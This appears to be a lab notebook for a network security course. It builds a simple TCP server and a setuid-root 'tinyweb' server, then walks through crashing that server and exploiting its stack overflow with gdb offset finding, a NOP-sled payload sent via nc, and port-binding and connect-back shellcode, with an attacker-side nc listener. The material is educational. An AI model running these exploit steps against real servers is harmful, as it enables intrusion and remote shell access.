# Network Exploitation

## A Simple Server Example
- a server that listens for TCP connection on port 7890
- when a client connects it sends a message *Hello World!* and receives data until connection is closed
- booksrc/simple_server.c and booksrc/hacking.h are the two files required to build the simple server
```
$ g++ simple_server.c -o simple_server.exe
$ ./simple_server.exe
$ telnet 127.0.0.1 7890
```

In [1]:
! cp ./booksrc/simple_server.c .
! cp ./booksrc/hacking.h .

In [2]:
! cat simple_server.c

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include "hacking.h"

#define PORT 7890	// the port users will be connecting to

int main(void) {
	int sockfd, new_sockfd;  // listen on sock_fd, new connection on new_fd
	struct sockaddr_in host_addr, client_addr;	// my address information
	socklen_t sin_size;
	int recv_length=1, yes=1;
	char buffer[1024];

	if ((sockfd = socket(PF_INET, SOCK_STREAM, 0)) == -1)
		fatal("in socket");

	if (setsockopt(sockfd, SOL_SOCKET, SO_REUSEADDR, &yes, sizeof(int)) == -1)
		fatal("setting socket option SO_REUSEADDR");
	
	host_addr.sin_family = AF_INET;		 // host byte order
	host_addr.sin_port = htons(PORT);	 // short, network byte order
	host_addr.sin_addr.s_addr = INADDR_ANY; // automatically fill with my IP
	memset(&(host_addr.sin_zero), '\0', 8); // zero the rest of the struct

	if (bind(sockfd, (struct sockaddr *)&host_addr, sizeof(struct sockaddr)) == -1)
		fatal("b

In [3]:
! cat hacking.h

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

// A function to display an error message and then exit
void fatal(char *message) {
   char error_message[100];

   strcpy(error_message, "[!!] Fatal Error ");
   strncat(error_message, message, 83);
   perror(error_message);
   exit(-1);
}

// An error checked malloc() wrapper function
void *ec_malloc(unsigned int size) {
   void *ptr;
   ptr = malloc(size);
   if(ptr == NULL)
      fatal("in ec_malloc() on memory allocation");
   return ptr;
}

// dumps raw memory in hex byte and printable split format
void dump(const unsigned char *data_buffer, const unsigned int length) {
	unsigned char byte;
	unsigned int i, j;
	for(i=0; i < length; i++) {
		byte = data_buffer[i];
		printf("%02x ", data_buffer[i]);  // display byte in hex
		if(((i%16)==15) || (i==length-1)) {
			for(j=0; j < 15-(i%16); j++)
				printf("   ");
			printf("| ");
			for(j=(i-(i%16)); j <= i; j++) {  // display printable bytes from line
				byte = data_buffer[

In [4]:
! ./compile.sh simple_server.c simple_server.exe

simple_server.c: In function ‘main’:
simple_server.c:48:3: warning: implicit declaration of function ‘close’; did you mean ‘pclose’? [-Wimplicit-function-declaration]
   48 |   close(new_sockfd);
      |   ^~~~~
      |   pclose


### run  ./simple_server.exe from terminal

- notice the log as clients connect to it

### install telnet client if not found

In [5]:
! telnet --help

telnet: invalid option -- '-'
Usage: telnet [-4] [-6] [-8] [-E] [-L] [-a] [-d] [-e char] [-l user]
	[-n tracefile] [ -b addr ] [-r] [host-name [port]]


In [ ]:
! echo kali | sudo -S apt install telnet

### run telnet client from another terminal
- interact with the server by sending some data on telnet prompt
- tlenet is line-buffered, hit enter to send data
- when done enter ctrl+] to close connection on telnet client prompt >

```bash
    telnet 127.0.0.1 7890
    this is a test from another terminal...<ENTER>
    here's some more data...<ENTER>
    do you read this from another terminal?
    ctrl+]
```

### run telnet from a remote system
- interact with the server by sending some data on telnet prompt
- tlenet is line-buffered, hit enter to send data
- when done enter ctrl+] to close connection on telnet client prompt >

```bash
    telnet <server ip> 7890
    this is a test from a remote system...
    here's some more data...
    do you read this from another system?
    ctrl+]
```

### check simple_serve log on the terminal
- notice 0x0D 0x0A at the end of every data sent
- telnet and HTTP protocols expect lines/data to be terminted with these two bytes


In [9]:
! man ascii | egrep "Hex|0A|0D"

       Oct   Dec   Hex   Char                        Oct   Dec   Hex   Char
       012   10    0A    LF  '\n' (new line)         112   74    4A    J
       015   13    0D    CR  '\r' (carriage ret)     115   77    4D    M


### telnet to a webserver
- open a terminal
- issue HEAD / HTTP/1.0 command and enter twice

```bash 
    telnet www.coloradomesa.edu 80
    HEAD / HTTP/1.0 <enter><enter>
```

## A Tinyweb Server
- similar to simple server but uses HTTP protocol to communicate
- handles HTTP GET and HEAD requests
- looks for the requested resource in the local directory callled webroot and sends it to the browser
- if the file is not found, the server responds with 404 HTTP (`File Not Found`) response
- compile booksrc/tinyweb.c, setuid as root and run the server


```bash
    sudo compile.sh tinyweb.c tinyweb.exe
    sudo chown root ./tinyweb.exe
    sudo chmod u+s ./tinyweb.exe
    ./tinyweb.exe
```

In [10]:
! cp booksrc/tinyweb.c .
! cp booksrc/hacking-network.h .
! cp booksrc/hacking.h .
! cp booksrc/compile.sh .

In [11]:
! cat tinyweb.c

#include <stdio.h>
#include <fcntl.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include "hacking.h"
#include "hacking-network.h"

#define PORT 80   // the port users will be connecting to
#define WEBROOT "./webroot" // the web server's root directory

void handle_connection(int, struct sockaddr_in *); // handle web requests
int get_file_size(int); // returns the filesize of open file descriptor

int main(void) {
   int sockfd, new_sockfd, yes=1; 
   struct sockaddr_in host_addr, client_addr;   // my address information
   socklen_t sin_size;

   printf("Accepting web requests on port %d\n", PORT);

   if ((sockfd = socket(PF_INET, SOCK_STREAM, 0)) == -1)
      fatal("in socket");

   if (setsockopt(sockfd, SOL_SOCKET, SO_REUSEADDR, &yes, sizeof(int)) == -1)
      fatal("setting socket option SO_REUSEADDR");

   host_addr.sin_family = AF_INET;      // host byte order
   host_addr.sin_port = htons

In [12]:
! cp -r booksrc/webroot .
! ls -l webroot

total 52
-rwxr-xr-x 1 kali kali 46794 Sep 16 16:24 image.jpg
-rw-r--r-- 1 kali kali   261 Sep 16 16:24 index.html


In [13]:
! cat webroot/index.html

<html>
<head><title>A sample webpage</title></head>
<body bgcolor="#000000" text="#ffffffff">
<center>
<h1>This is a sample webpage</h1>
...and here is some sample text<br>
<br>
..and even a sample image:<br>
<img src="image.jpg"><br>
</center>
</body>
</html>


In [14]:
! cat hacking-network.h

/* This function accepts a socket FD and a ptr to the null terminated
 * string to send.  The function will make sure all the bytes of the
 * string are sent.  Returns 1 on success and 0 on failure.
 */
int send_string(int sockfd, unsigned char *buffer) {
   int sent_bytes, bytes_to_send;
   bytes_to_send = strlen(buffer);
   while(bytes_to_send > 0) {
      sent_bytes = send(sockfd, buffer, bytes_to_send, 0);
      if(sent_bytes == -1)
         return 0; // return 0 on send error
      bytes_to_send -= sent_bytes;
      buffer += sent_bytes;
   }
   return 1; // return 1 on success
}

/* This function accepts a socket FD and a ptr to a destination
 * buffer.  It will receive from the socket until the EOL byte
 * sequence in seen.  The EOL bytes are read from the socket, but
 * the destination buffer is terminated before these bytes.
 * Returns the size of the read line (without EOL bytes).
 */
int recv_line(int sockfd, unsigned char *dest_buffer) {
#define EOL "\r\n" // End-Of-Line by

In [15]:
! echo kali | sudo -S ./compile.sh tinyweb.c tinyweb.exe

[sudo] password for kali: tinyweb.c: In function ‘handle_connection’:
tinyweb.c:101:16: warning: implicit declaration of function ‘read’; did you mean ‘fread’? [-Wimplicit-function-declaration]
  101 |                read(fd, ptr, length); // read the file into memory
      |                ^~~~
      |                fread
tinyweb.c:105:13: warning: implicit declaration of function ‘close’; did you mean ‘pclose’? [-Wimplicit-function-declaration]
  105 |             close(fd); // close the file
      |             ^~~~~
      |             pclose


In [16]:
! cat hacking.h

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

// A function to display an error message and then exit
void fatal(char *message) {
   char error_message[100];

   strcpy(error_message, "[!!] Fatal Error ");
   strncat(error_message, message, 83);
   perror(error_message);
   exit(-1);
}

// An error checked malloc() wrapper function
void *ec_malloc(unsigned int size) {
   void *ptr;
   ptr = malloc(size);
   if(ptr == NULL)
      fatal("in ec_malloc() on memory allocation");
   return ptr;
}

// dumps raw memory in hex byte and printable split format
void dump(const unsigned char *data_buffer, const unsigned int length) {
	unsigned char byte;
	unsigned int i, j;
	for(i=0; i < length; i++) {
		byte = data_buffer[i];
		printf("%02x ", data_buffer[i]);  // display byte in hex
		if(((i%16)==15) || (i==length-1)) {
			for(j=0; j < 15-(i%16); j++)
				printf("   ");
			printf("| ");
			for(j=(i-(i%16)); j <= i; j++) {  // display printable bytes from line
				byte = data_buffer[

In [17]:
! echo kali | sudo -S chown root:root ./tinyweb.exe

[sudo] password for kali: 

In [18]:
! ls -al tinyweb.exe

-rwxr-xr-x 1 root root 22488 Sep 18 14:22 tinyweb.exe


In [19]:
! echo kali | sudo -S chmod u+s ./tinyweb.exe

[sudo] password for kali: 

In [20]:
! ls -al tinyweb.exe

-rwsr-xr-x 1 root root 22488 Sep 18 14:22 tinyweb.exe


### run tinyweb.exe from a terminal
### open a browser and browse to localhost

## Tinyweb Stack Overflow Exploitation

- crash the Tinyweb server
- pawn the system

## Crash the Tinyweb server

- use a different VM or a machine (attacker machine)
- generate a junk data of 1000 bytes and send it to the server


In [ ]:
! python -c 'print("A"*1000, end="\r\n")' > junk.txt

In [ ]:
# replace telnet_serverip and port

! cat junk.txt | nc -v [severip] [port]

## Pawn the system

- find the overlfow vulnerability
- find the return address and offset from request buffer
- run the tinyweb.exe and get its process id to attach it to the gdb

```bash
$ ps aux | grep tinyweb
```

- Attach gdb to the tinyweb server

```
$ sudo gdb -q --pid=[tinywebpid] --symbols=./tinyweb.exe
```

- use gdb to examine memory and addresses

```bash
$ list
$ list main
$ list 44 # list 10 lines around line #44
$ break 62 # break at recv_line function that has overrun issue
$ continue # make a get request using a terminal or browser to hit the breakpoint
$ print request
$ print /x &request # Note the address of request variable
$ x/16wx request+500 # examine 16 words at request+500 bytes in stack - return address must be definitely 500 bytes away from request!
$ bt  # gives the return address to main
$ x/x $ebp+4 # prints the return address
$ p /u <return address> - <request address> # OFFSET to return address: 524 bytes
```

- exit the debugger and rerun the server on the same terminal

## Local Shellcode Exploit
- create a exploit code and send it to the server
- use a different terminal on the same system
- total length of string buffer is the offset or difference between the return address - request buffer + 4 bytes

```
| repeated NOP SLED \x90 | exploit code | repeated controlled return addrees that will land somewhere in NOP SLED |

```

- total length - exploit code length - 30 x return address

```bash
echo $((524+4-24-30*4))
```

- find soft landing address in nop sled about 100 bytes away from the base address; just for safety!

```bash
printf "%x" $((address of request + 100))
```

- create and send the final exploit code

```bash
echo -n $(perl -e 'print "\x90"x384'; cat shellcode.bin; perl -e 'print "landing address in reverse order"x30 . "\r\n"') > tinyexploit.txt
cat tinyexploit.txt | nc -v 127.0.0.1 [port]
```

- you'll get a local shell on the terminal where tinyweb.exe is running

## Remote Exploit - Port Binding Shellcode

- use a different VM or system as an attacker machine
- create Port Binding Shellcode Exploit
- Generate Shellcode using GDB PEDA
- add about 100 bytes to the beginning address of request to get the working landing address

```
gdb-peda$ shellcode generate
gdb-peda$ shellcode generate x86/linux bindport  port ip
$ perl -e 'print "copy line by line"' >> bindport.bin
$ echo -n $(perl -e 'print "\x90"x384'; cat bindport.bin; perl -e 'print "landing address in reverse order"x30 . "\r\n"') > tinyexploit.bin
$ cat tinyexploit.txt | nc -v ip port
```

- from another shell use **nc** to connect to the victim ip using the shellcode port

```bash
nc -v [ip] [port]
``` 

- connecting to the victim machine is not easy due to firewall and IDS, IPS, etc.
- however, outgoing connection is typically allowed
- use the following exploit!

## Remote Exploit - Connect-back Shellcode

- use a different VM or system as an attacker machine
- create connect back (TCP Reverse connect) shellcode
- Generate Shellcode using GDB PEDA
- add about 100 bytes to the beginning address of request to get the working landing address

```bash 
gdb-peda$ shellcode generate x86/linux connect port ip

```

- write shellcode to a file as binary one line at a time


```bash
$ echo -n -e "shellcode line1" > reverse_tcp.bin
$ echo -n -e "shellcode line2" >> reverse_tcp.bin
...
```

- calculate [\<NOP sled>*n + reverse_tcp.bin + \<repeated return address>]
- repeated return address = \<address of request> + 100
- run a server on attacker machine so the victim can connect back

```bash
    nc -v -l -p port
```

- create the exploit code and send it as a request to the Tinyweb server using netcat

```bash
$ echo -n -e $(perl -e 'print "\x90"xn; cat reverse_tcp.bin; perl -e 'print "controlled return add"xN . "\r\n"' | nc -v [ip] [port]
```